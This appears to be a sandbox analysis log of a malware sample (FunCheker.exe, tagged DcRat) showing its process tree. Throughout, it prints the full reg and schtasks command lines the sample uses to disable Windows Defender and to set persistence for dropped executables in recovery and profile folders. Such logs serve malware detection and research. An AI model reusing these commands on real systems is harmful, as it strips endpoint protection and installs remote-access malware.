C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1276
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:5072
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵PID:1652
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f3⤵PID:5108
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵PID:2284
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵PID:2280
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:2952
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:1100
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵PID:3936
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵PID:1624
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵PID:4960
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵PID:3784
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵PID:2072
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f3⤵PID:1324
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵PID:1060
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵PID:1376
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵PID:776
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵PID:4636
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:3088
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:5044
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:3612
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:2660
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
PID:1352
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2976
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4140
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2148
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1572
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1356
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5084
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Cookies\RuntimeBroker.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2312
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\Cookies\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3916
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Cookies\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:704
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4784
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:512 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc54b846f8,0x7ffc54b84708,0x7ffc54b847182⤵PID:3780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1912 /prefetch:22⤵PID:4316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:82⤵PID:3640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:12⤵PID:4984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:12⤵PID:1100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:12⤵PID:452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:12⤵PID:4192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3580 /prefetch:82⤵PID:2960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3580 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:12⤵PID:1724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:12⤵PID:2548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:12⤵PID:860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:12⤵PID:4656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4248 /prefetch:82⤵PID:4988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5760 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:3156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:12⤵PID:2508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:12⤵PID:4884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:12⤵PID:5296
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:12⤵PID:5588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:12⤵PID:5600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:12⤵PID:5896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5320 /prefetch:82⤵PID:5216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4148 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:3804
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4000
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2952
-
C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"1⤵
- Checks computer location settings
PID:4932 -
C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:1564 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"3⤵
- Checks computer location settings
PID:4432 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "4⤵PID:5424
-
C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6108 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6GXVlfePFq.bat"6⤵PID:1424
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:5856
-
-
C:\Windows\ja-JP\msedge.exe"C:\Windows\ja-JP\msedge.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5252
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "2⤵PID:3320
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "2⤵PID:2708
-
C:\Windows\system32\chcp.comchcp 650013⤵PID:2364
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "2⤵PID:5876
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:5960
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵PID:3608
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵PID:5852
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵PID:692
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4852
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1228
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:5448
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:5460
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:5984
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵PID:5236
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f3⤵PID:764
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵PID:5456
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵PID:4572
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:5196
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:6140
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵PID:2960
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵PID:6072
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵PID:5168
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵PID:4340
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵PID:4308
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f3⤵PID:3936
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵PID:968
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵PID:3492
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵PID:1668
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵PID:2652
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:3916
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:5256
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:1724
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:1676
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
PID:5452
-
-
-
C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"1⤵
- Checks computer location settings
PID:4220 -
C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:5960 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"3⤵
- Checks computer location settings
PID:4064 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "4⤵PID:2136
-
C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4160
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "2⤵PID:5292
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "2⤵PID:6096
-
C:\Windows\system32\chcp.comchcp 650013⤵PID:2412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "2⤵PID:1244
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1664
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵PID:1044
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵PID:5276
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵PID:3336
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:6124
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3236
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:5332
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:5768
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:772
-
-
